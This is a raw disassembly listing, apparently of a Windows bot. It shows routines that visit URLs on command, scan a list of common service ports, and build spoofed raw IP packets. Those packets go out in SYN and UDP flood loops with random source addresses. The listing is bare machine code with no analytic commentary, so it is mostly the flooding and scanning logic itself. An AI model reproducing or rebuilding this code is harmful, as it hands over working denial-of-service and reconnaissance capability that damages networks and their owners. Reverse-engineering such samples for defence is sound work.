loc_428227: ; CODE XREF: sub_42810F+58�j
; sub_42810F+F9�j
push [esp+154h+var_144]
call dword_437140 ; FindClose
push 10h
push esi
call dword_437068 ; SetFileAttributesA
push esi
call ebx ; dword_43714C
pop edi
pop esi
pop ebp
pop ebx
add esp, 144h
retn
sub_42810F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428248 proc near ; DATA XREF: sub_40A9FE+8250�o
var_2B6C = byte ptr -2B6Ch
var_45C = byte ptr -45Ch
var_35C = byte ptr -35Ch
var_2DC = byte ptr -2DCh
var_25C = byte ptr -25Ch
var_1DC = dword ptr -1DCh
var_1D8 = byte ptr -1D8h
var_158 = byte ptr -158h
var_D8 = byte ptr -0D8h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2B6Ch
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_1DC]
rep movsd
xor esi, esi
mov edi, 80h
inc esi
xor ebx, ebx
mov [eax+190h], esi
mov eax, [ebp+var_1DC]
mov [ebp+arg_0], eax
push edi
lea eax, [ebp+var_35C]
push ebx
push eax
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], offset asc_450DD8 ; "*/*"
call sub_429760
push edi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_429760
push edi
lea eax, [ebp+var_25C]
push ebx
push eax
call sub_429760
push 100h
lea eax, [ebp+var_45C]
push ebx
push eax
call sub_429760
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_429760
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_1D8]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1D8]
push eax
call dword_456DE8 ; InternetCrackUrlA
test eax, eax
jz loc_4283FA
cmp [ebp+var_34], ebx
jbe short loc_42832C
push [ebp+var_34]
lea eax, [ebp+var_35C]
push [ebp+var_38]
push eax
call sub_429D10
add esp, 0Ch
loc_42832C: ; CODE XREF: sub_428248+CD�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_42834A
push [ebp+var_28]
lea eax, [ebp+var_2DC]
push [ebp+var_2C]
push eax
call sub_429D10
add esp, 0Ch
loc_42834A: ; CODE XREF: sub_428248+EB�j
cmp [ebp+var_20], ebx
jbe short loc_428364
push [ebp+var_20]
lea eax, [ebp+var_25C]
push [ebp+var_24]
push eax
call sub_429D10
add esp, 0Ch
loc_428364: ; CODE XREF: sub_428248+105�j
cmp [ebp+var_18], ebx
jbe short loc_42837E
push [ebp+var_18]
lea eax, [ebp+var_45C]
push [ebp+var_1C]
push eax
call sub_429D10
add esp, 0Ch
loc_42837E: ; CODE XREF: sub_428248+11F�j
push ebx
push ebx
lea eax, [ebp+var_25C]
push 3
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_35C]
push esi
push eax
push dword_456ED0
call dword_456F00 ; InternetConnectA
mov edi, eax
cmp edi, ebx
jz short loc_428415
push ebx
lea eax, [ebp+var_C]
push 200h
push eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_45C]
push ebx
push eax
push ebx
push edi
call dword_456EF0 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_428421
push ebx
push ebx
push ebx
push ebx
push eax
call dword_456E7C ; HttpSendRequestA
test eax, eax
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
lea eax, [ebp+var_2B6C]
jz short loc_4283F3
push offset aSUrlVisited_ ; "%s URL visited."
jmp short loc_428431
; ---------------------------------------------------------------------------
loc_4283F3: ; CODE XREF: sub_428248+1A2�j
push offset aSFailedToGetRe ; "%s Failed to get requested URL from HTT"...
jmp short loc_428431
; ---------------------------------------------------------------------------
loc_4283FA: ; CODE XREF: sub_428248+C4�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
lea eax, [ebp+var_2B6C]
push offset aSInvalidUrl_ ; "%s Invalid URL."
push eax
call sub_429B03
mov edi, [ebp+var_8]
jmp short loc_428437
; ---------------------------------------------------------------------------
loc_428415: ; CODE XREF: sub_428248+160�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push offset aSCouldNotOpenA ; "%s Could not open a connection."
jmp short loc_42842B
; ---------------------------------------------------------------------------
loc_428421: ; CODE XREF: sub_428248+188�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push offset aSFailedToConne ; "%s Failed to connect to HTTP server."
loc_42842B: ; CODE XREF: sub_428248+1D7�j
lea eax, [ebp+var_2B6C]
loc_428431: ; CODE XREF: sub_428248+1A9�j
; sub_428248+1B0�j
push eax
call sub_429B03
loc_428437: ; CODE XREF: sub_428248+1CB�j
add esp, 0Ch
cmp [ebp+var_54], ebx
mov esi, offset aS_5 ; "%s"
jnz short loc_428463
cmp [ebp+var_50], ebx
jnz short loc_428468
lea eax, [ebp+var_2B6C]
push eax
lea eax, [ebp+var_D8]
push esi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 10h
loc_428463: ; CODE XREF: sub_428248+1FA�j
cmp [ebp+var_50], ebx
jz short loc_428482
loc_428468: ; CODE XREF: sub_428248+1FF�j
lea eax, [ebp+var_2B6C]
push eax
lea eax, [ebp+var_D8]
push esi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 10h
loc_428482: ; CODE XREF: sub_428248+21E�j
push edi
call dword_456F70 ; InternetCloseHandle
push [ebp+var_4]
call dword_456F70 ; InternetCloseHandle
push [ebp+var_58]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebx
sub_428248 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4284A5 proc near ; DATA XREF: sub_40A9FE+6D9E�o
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 124h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_124]
rep movsd
mov dword ptr [eax+120h], 1
mov eax, [ebp+var_124]
xor ecx, ecx
mov [ebp+arg_0], eax
cmp [ebp+var_8], ecx
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
mov esi, offset aSSPortsHitS ; "%s %s, ports hit: (%s)"
jnz short loc_428523
cmp [ebp+var_C], ecx
jnz short loc_428528
push [ebp+var_14]
lea edx, [ebp+var_120]
push [ebp+var_18]
push edx
push ecx
push ecx
lea ecx, [ebp+var_A0]
push ecx
push eax
call sub_428660
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 34h
xor ecx, ecx
loc_428523: ; CODE XREF: sub_4284A5+43�j
cmp [ebp+var_C], ecx
jz short loc_428563
loc_428528: ; CODE XREF: sub_4284A5+48�j
push [ebp+var_14]
lea eax, [ebp+var_120]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push [ebp+var_C]
push [ebp+var_8]
push eax
push [ebp+var_124]
call sub_428660
push eax
push ebx
push edi
lea eax, [ebp+var_A0]
push esi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 34h
loc_428563: ; CODE XREF: sub_4284A5+81�j
push [ebp+var_20]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebx
sub_4284A5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428577 proc near ; CODE XREF: sub_428660+116�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_4285A0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4372CC ; connect
jmp loc_42865C
; ---------------------------------------------------------------------------
loc_4285A0: ; CODE XREF: sub_428577+13�j
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
xor edi, edi
push eax
inc edi
push 8004667Eh
push esi
mov [ebp+var_8], edi
call dword_437290 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_456EBC ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call dword_456F1C ; select
test eax, eax
jnz short loc_428604
or eax, 0FFFFFFFFh
jmp short loc_42865C
; ---------------------------------------------------------------------------
loc_428604: ; CODE XREF: sub_428577+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_42860F
loc_42860B: ; CODE XREF: sub_428577+B8�j
; sub_428577+DC�j
mov eax, edi
jmp short loc_42865C
; ---------------------------------------------------------------------------
loc_42860F: ; CODE XREF: sub_428577+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_4290BE ; __WSAFDIsSet
test eax, eax
jnz short loc_428631
lea eax, [ebp+var_210]
push eax
push esi
call sub_4290BE ; __WSAFDIsSet
test eax, eax
jz short loc_42860B
loc_428631: ; CODE XREF: sub_428577+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call dword_4372E8 ; getsockopt
cmp eax, edi
jz short loc_42860B
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_42865C: ; CODE XREF: sub_428577+24�j
; sub_428577+8B�j ...
pop edi
pop esi
leave
retn
sub_428577 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428660 proc near ; CODE XREF: sub_4284A5+61�p
; sub_4284A5+A3�p
var_AC = dword ptr -0ACh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 9Ch
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
xor esi, esi
push ebx
push esi
push esi
push 0FFh
push 3
push 2
mov [ebp+var_14], ebx
call dword_4372C8 ; WSASocketA
lea eax, [ebp+var_14]
push 4
push eax
push 2
push esi
push esi
mov dword_6764F8, esi
call dword_43728C ; setsockopt
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
xor eax, eax
lea edi, [ebp+var_20]
mov [ebp+var_54], ebx
mov [ebp+var_50], 15h
mov [ebp+var_4C], 16h
mov [ebp+var_48], 17h
mov [ebp+var_44], 35h
mov [ebp+var_40], 50h
mov [ebp+var_3C], 71h
mov [ebp+var_38], 87h
mov [ebp+var_34], 8Bh
mov [ebp+var_30], 1BDh
mov [ebp+var_2C], 0CEAh
mov [ebp+var_28], 0D3Dh
mov [ebp+var_24], 1A0Bh
stosd
push 0Bh
lea edi, [ebp+var_90]
pop ecx
mov [ebp+var_9C], esi
mov [ebp+var_98], esi
mov [ebp+var_94], esi
rep stosd
mov [ebp+var_C], esi
mov [ebp+var_1C], 3
mov [ebp+var_18], 0BB8h
mov [ebp+var_4], esi
loc_428737: ; CODE XREF: sub_428660+143�j
push [ebp+arg_10]
mov [ebp+var_64], 2
call sub_41E3EC
mov [ebp+var_60], eax
mov eax, [ebp+var_4]
pop ecx
lea edi, [ebp+eax+var_54]
mov ax, [edi]
push eax
call dword_456F38 ; ntohs
push esi
push ebx
push 2
mov [ebp+var_62], ax
call dword_456FD0 ; socket
lea ecx, [ebp+var_1C]
mov [ebp+var_8], eax
push ecx
lea ecx, [ebp+var_64]
push 10h
push ecx
push eax
call sub_428577
add esp, 10h
mov [ebp+var_10], eax
push [ebp+var_8]
call dword_456FF0 ; closesocket
cmp [ebp+var_10], esi
jnz short loc_42879B
mov ecx, [ebp+var_4]
mov eax, [edi]
mov [ebp+ecx+var_9C], eax
loc_42879B: ; CODE XREF: sub_428660+12D�j
add [ebp+var_4], 4
cmp [ebp+var_4], 38h
jl short loc_428737
mov edi, 400h
push offset asc_43D938 ; " "
push edi
push offset dword_676500
call sub_429BBE
add esp, 0Ch
call dword_437188 ; GetTickCount
mov [ebp+var_8], eax
mov [ebp+var_4], esi
mov ebx, 0FFFFh
loc_4287CE: ; CODE XREF: sub_428660+1CB�j
call dword_437188 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_14]
ja short loc_42882D
mov eax, [ebp+var_4]
mov eax, [ebp+eax*4+var_9C]
cmp eax, esi
jz short loc_42880E
mov [ebp+var_C], eax
push eax
mov eax, offset dword_676500
push eax
push offset aSD ; "%s%d "
push edi
push eax
call sub_429BBE
add esp, 14h
jmp short loc_428824
; ---------------------------------------------------------------------------
loc_42880E: ; CODE XREF: sub_428660+191�j
push ebx
push esi
call sub_41E415
pop ecx
pop ecx
push eax
call dword_456F38 ; ntohs
movzx eax, ax
mov [ebp+var_C], eax
loc_428824: ; CODE XREF: sub_428660+1AC�j
inc [ebp+var_4]
cmp [ebp+var_4], 0Eh
jl short loc_4287CE
loc_42882D: ; CODE XREF: sub_428660+183�j
; sub_428660+409�j
push 28h
push esi
push offset byte_67649C
call sub_429760
push ebx
push edi
mov byte_67649C, 45h
mov byte_6764A5, 6
mov byte_67649D, 8
call sub_41E415
add esp, 14h
push eax
call dword_456F38 ; ntohs
push 28h
mov word_6764A0, ax
call dword_456F38 ; ntohs
push [ebp+arg_10]
mov word_67649E, ax
mov word_6764A2, si
mov byte_6764A4, 40h
call sub_41E3EC
mov edi, eax
mov [esp+0ACh+var_AC], 0FFFEh
push 1
and edi, ebx
call sub_41E415
push [ebp+arg_10]
shl eax, 20h
or eax, edi
mov dword_6764A8, eax
call sub_41E3EC
and byte_6764BD, 0
add esp, 0Ch
mov dword_6764AC, eax
push 2000h
call dword_456F38 ; ntohs
push ebx
push esi
mov word_6764BE, ax
call sub_41E415
mov edi, eax
push ebx
push esi
shl edi, 8
call sub_41E415
add esp, 10h
add edi, eax
push edi
call dword_456F34 ; ntohl
mov dword_6764B4, eax
mov al, byte_6764BC
push [ebp+arg_10]
and al, 0Fh
or al, 50h
mov dword_6764B8, esi
mov byte_6764BC, al
mov ax, word ptr [ebp+var_C]
mov word_6764C2, si
mov word_6764B2, ax
call sub_41E3EC
and byte_6764DC, 0
pop ecx
push 14h
mov dword_6764D8, eax
mov byte_6764DD, 6
call dword_456F38 ; ntohs
push [ebp+arg_10]
mov word_6764DE, ax
mov word_6764C4, 2
call sub_41E3EC
mov dword_6764C8, eax
mov ax, word_6764B2
pop ecx
mov word_6764C6, ax
mov [ebp+var_4], esi
jmp short loc_42896B
; ---------------------------------------------------------------------------
loc_428969: ; CODE XREF: sub_428660+3DC�j
xor esi, esi
loc_42896B: ; CODE XREF: sub_428660+307�j
cmp [ebp+var_4], esi
push ebx
push esi
jnz short loc_42899F
call sub_41E415
pop ecx
pop ecx
push eax
call dword_456F38 ; ntohs
mov word_6764B0, ax
mov eax, dword_6764A8
mov dword_6764D4, eax
mov byte_6764BD, 2
mov dword_6764B8, esi
jmp short loc_4289BC
; ---------------------------------------------------------------------------
loc_42899F: ; CODE XREF: sub_428660+310�j
mov byte_6764BD, 10h
call sub_41E415
pop ecx
pop ecx
push eax
call dword_456F38 ; ntohs
movzx eax, ax
mov dword_6764B8, eax
loc_4289BC: ; CODE XREF: sub_428660+33D�j
inc word_6764A0
inc dword_6764B4
mov ax, word_6764B2
push 5
mov word_6764A6, si
mov word_6764C0, si
pop ecx
mov esi, offset word_6764B0
mov edi, offset dword_6764E0
push 14h
rep movsd
mov esi, offset byte_67649C
mov word_6764C6, ax
push esi
call sub_41E3E8
push 20h
push offset dword_6764D4
mov word_6764A6, ax
call sub_41E3E8
add esp, 10h
mov word_6764C0, ax
push 10h
push offset word_6764C4
push 0
push 28h
push esi
push dword_6764F8
call dword_456FAC ; sendto
inc [ebp+var_4]
cmp [ebp+var_4], 3FFh
jl loc_428969
call dword_437188 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_14]
ja short loc_428A6E
push [ebp+arg_18]
call dword_437190 ; Sleep
xor esi, esi
mov edi, 400h
jmp loc_42882D
; ---------------------------------------------------------------------------
loc_428A6E: ; CODE XREF: sub_428660+3F7�j
pop edi
pop esi
mov eax, offset dword_676500
pop ebx
leave
retn
sub_428660 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428A78 proc near ; DATA XREF: sub_40A9FE+7C54�o
var_22C = byte ptr -22Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 47h
mov esi, eax
pop ecx
lea edi, [ebp+var_128]
rep movsd
mov ecx, [ebp+var_128]
mov esi, offset dword_457CF8
push 100h
push esi
mov [ebp+var_4], ecx
mov dword ptr [eax+118h], 1
call dword_4372E0 ; gethostname
push esi
call dword_4372A4 ; gethostbyname
mov eax, [eax+0Ch]
push esi
mov esi, dword_4372C0
mov eax, [eax]
mov edi, [eax]
call esi ; dword_4372C0
lea eax, [ebp+var_124]
push eax
call esi ; dword_4372C0
mov ebx, [ebp+var_20]
mov esi, [ebp+var_1C]
push 0
mov [ebp+var_8], eax
call sub_42A7D5
push eax
call sub_429B8F
pop ecx
test esi, esi
pop ecx
jle loc_428B92
mov [ebp+var_C], esi
loc_428AFB: ; CODE XREF: sub_428A78+114�j
call sub_429B9C
cdq
mov ecx, 0FFh
and edi, 0FFFFFFh
idiv ecx
shl edx, 18h
or edi, edx
call sub_429B9C
and [ebp+arg_0], 0
mov esi, eax
and esi, 0FFh
inc esi
test esi, esi
jle short loc_428B40
loc_428B29: ; CODE XREF: sub_428A78+C6�j
call sub_429B9C
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
cmp [ebp+arg_0], esi
mov [ebp+ecx+var_22C], al
jl short loc_428B29
loc_428B40: ; CODE XREF: sub_428A78+AF�j
call sub_429B9C
and eax, 3
jl short loc_428B89
cmp eax, 1
jle short loc_428B6E
cmp eax, 2
jnz short loc_428B89
push ebx
push [ebp+var_8]
call sub_429B9C
push eax
push edi
lea eax, [ebp+var_22C]
push esi
push eax
call sub_428DF8
jmp short loc_428B86
; ---------------------------------------------------------------------------
loc_428B6E: ; CODE XREF: sub_428A78+D5�j
push ebx
push [ebp+var_8]
call sub_429B9C
push eax
push edi
lea eax, [ebp+var_22C]
push esi
push eax
call sub_428BFF
loc_428B86: ; CODE XREF: sub_428A78+F4�j
add esp, 18h
loc_428B89: ; CODE XREF: sub_428A78+D0�j
; sub_428A78+DA�j
dec [ebp+var_C]
jnz loc_428AFB
loc_428B92: ; CODE XREF: sub_428A78+7A�j
cmp [ebp+var_14], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
mov esi, offset aSSS_0 ; "%s %s (%s)"
jnz short loc_428BC9
cmp [ebp+var_18], 0
jnz short loc_428BCF
lea eax, [ebp+var_124]
push eax
push ebx
push edi
lea eax, [ebp+var_A4]
push esi
push eax
push [ebp+var_4]
call sub_41CE4A
add esp, 18h
loc_428BC9: ; CODE XREF: sub_428A78+12D�j
cmp [ebp+var_18], 0
jz short loc_428BEB
loc_428BCF: ; CODE XREF: sub_428A78+133�j
lea eax, [ebp+var_124]
push eax
push ebx
push edi
lea eax, [ebp+var_A4]
push esi
push eax
push [ebp+var_4]
call sub_41CDD4
add esp, 18h
loc_428BEB: ; CODE XREF: sub_428A78+155�j
push [ebp+var_24]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebx
sub_428A78 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428BFF proc near ; CODE XREF: sub_428A78+109�p
var_1038 = byte ptr -1038h
var_1034 = byte ptr -1034h
var_102F = byte ptr -102Fh
var_102E = byte ptr -102Eh
var_102C = byte ptr -102Ch
var_1024 = byte ptr -1024h
var_101C = byte ptr -101Ch
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 1038h
call sub_429B60
push ebx
xor ebx, ebx
push ebx
push ebx
push ebx
push 11h
push 3
push 2
call dword_4372C8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz short loc_428C42
lea ecx, [ebp+var_24]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_24], 1
call dword_43728C ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_428C49
loc_428C42: ; CODE XREF: sub_428BFF+25�j
xor eax, eax
jmp loc_428DF5
; ---------------------------------------------------------------------------
loc_428C49: ; CODE XREF: sub_428BFF+41�j
push esi
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_20], 45h
lea esi, [edi+1Ch]
mov [ebp+var_28], esi
call sub_429B9C
push esi
mov esi, dword_4372C4
mov [ebp+var_1F], al
call esi ; dword_4372C4
mov [ebp+var_1E], ax
call sub_429B9C
push eax
call esi ; dword_4372C4
mov [ebp+var_1C], ax
call sub_429B9C
push [ebp+arg_C]
mov [ebp+var_1A], ax
mov eax, [ebp+arg_8]
mov [ebp+var_18], 80h
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_17], 11h
mov [ebp+var_16], bx
mov [ebp+var_10], eax
call esi ; dword_4372C4
push [ebp+arg_14]
mov [ebp+var_8], ax
call esi ; dword_4372C4
add edi, 8
mov [ebp+var_6], ax
push edi
call esi ; dword_4372C4
mov edi, 200h
mov [ebp+var_4], ax
push edi
lea eax, [ebp+var_1038]
push ebx
push eax
mov [ebp+var_2], bx
call sub_429760
lea eax, [ebp+var_14]
push 4
push eax
lea eax, [ebp+var_1038]
push eax
call sub_429420
lea eax, [ebp+var_10]
push 4
push eax
lea eax, [ebp+var_1034]
push eax
call sub_429420
lea eax, [ebp+var_17]
push 1
push eax
lea eax, [ebp+var_102F]
push eax
call sub_429420
lea eax, [ebp+var_4]
push 2
push eax
lea eax, [ebp+var_102E]
push eax
call sub_429420
lea eax, [ebp+var_8]
push 8
push eax
lea eax, [ebp+var_102C]
push eax
call sub_429420
movzx esi, word ptr [ebp+arg_4]
add esp, 48h
lea eax, [ebp+var_1024]
push esi
push [ebp+arg_0]
push eax
call sub_429420
lea eax, [esi+14h]
push eax
lea eax, [ebp+var_1038]
push eax
call sub_42904F
mov [ebp+var_2], ax
push edi
lea eax, [ebp+var_1038]
push ebx
push eax
call sub_429760
lea eax, [ebp+var_20]
push 14h
push eax
lea eax, [ebp+var_1038]
push eax
call sub_429420
lea eax, [ebp+var_8]
push 8
push eax
lea eax, [ebp+var_1024]
push eax
call sub_429420
push esi
lea eax, [ebp+var_101C]
push [ebp+arg_0]
push eax
call sub_429420
add esp, 44h
lea eax, [ebp+var_38]
push 10h
push ebx
push eax
call sub_429760
mov ax, [ebp+var_6]
add esp, 0Ch
mov [ebp+var_36], ax
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
lea eax, [ebp+var_38]
push 10h
push eax
movzx eax, word ptr [ebp+var_28]
push ebx
push eax
lea eax, [ebp+var_1038]
mov [ebp+var_38], 2
push eax
push [ebp+var_C]
call dword_437294 ; sendto
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
push 2
mov esi, ecx
call dword_437190 ; Sleep
push [ebp+var_C]
call dword_4372D8 ; closesocket
mov eax, esi
pop edi
pop esi
loc_428DF5: ; CODE XREF: sub_428BFF+45�j
pop ebx
leave
retn
sub_428BFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428DF8 proc near ; CODE XREF: sub_428A78+EF�p
var_1044 = byte ptr -1044h
var_1040 = byte ptr -1040h
var_103B = byte ptr -103Bh
var_103A = byte ptr -103Ah
var_1038 = byte ptr -1038h
var_1030 = byte ptr -1030h
var_1024 = byte ptr -1024h
var_101C = byte ptr -101Ch
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 1044h
call sub_429B60
push edi
xor edi, edi
push edi
push edi
push edi
push 0FFh
push 3
push 2
call dword_4372C8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_18], eax
jz short loc_428E3E
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push edi
push eax
mov [ebp+var_34], 1
call dword_43728C ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_428E45
loc_428E3E: ; CODE XREF: sub_428DF8+28�j
xor eax, eax
jmp loc_42904C
; ---------------------------------------------------------------------------
loc_428E45: ; CODE XREF: sub_428DF8+44�j
mov eax, [ebp+arg_4]
push ebx
push esi
mov [ebp+var_14], 45h
lea esi, [eax+28h]
mov [ebp+var_30], esi
call sub_429B9C
push esi
mov esi, dword_4372C4
mov [ebp+var_13], al
call esi ; dword_4372C4
mov [ebp+var_12], ax
call sub_429B9C
push eax
call esi ; dword_4372C4
mov [ebp+var_10], ax
call sub_429B9C
push [ebp+arg_C]
mov [ebp+var_E], ax
mov eax, [ebp+arg_8]
mov [ebp+var_C], 80h
mov [ebp+var_8], eax
mov eax, [ebp+arg_10]
mov [ebp+var_B], 6
mov [ebp+var_A], di
mov [ebp+var_4], eax
call esi ; dword_4372C4
push [ebp+arg_14]
mov [ebp+var_2C], ax
call esi ; dword_4372C4
mov [ebp+var_2A], ax
call sub_429B9C
mov ebx, dword_4372E4
push eax
call ebx ; dword_4372E4
mov [ebp+var_24], eax
mov eax, [ebp+arg_4]
add eax, 14h
push eax
call esi ; dword_4372C4
mov [ebp+var_20], al
call sub_429B9C
mov [ebp+var_1F], al
call sub_429B9C
push eax
call ebx ; dword_4372E4
push 1A0Ah
mov [ebp+var_28], eax
mov [ebp+var_1A], di
call esi ; dword_4372C4
mov ebx, 200h
mov [ebp+var_1E], ax
push ebx
lea eax, [ebp+var_1044]
push edi
push eax
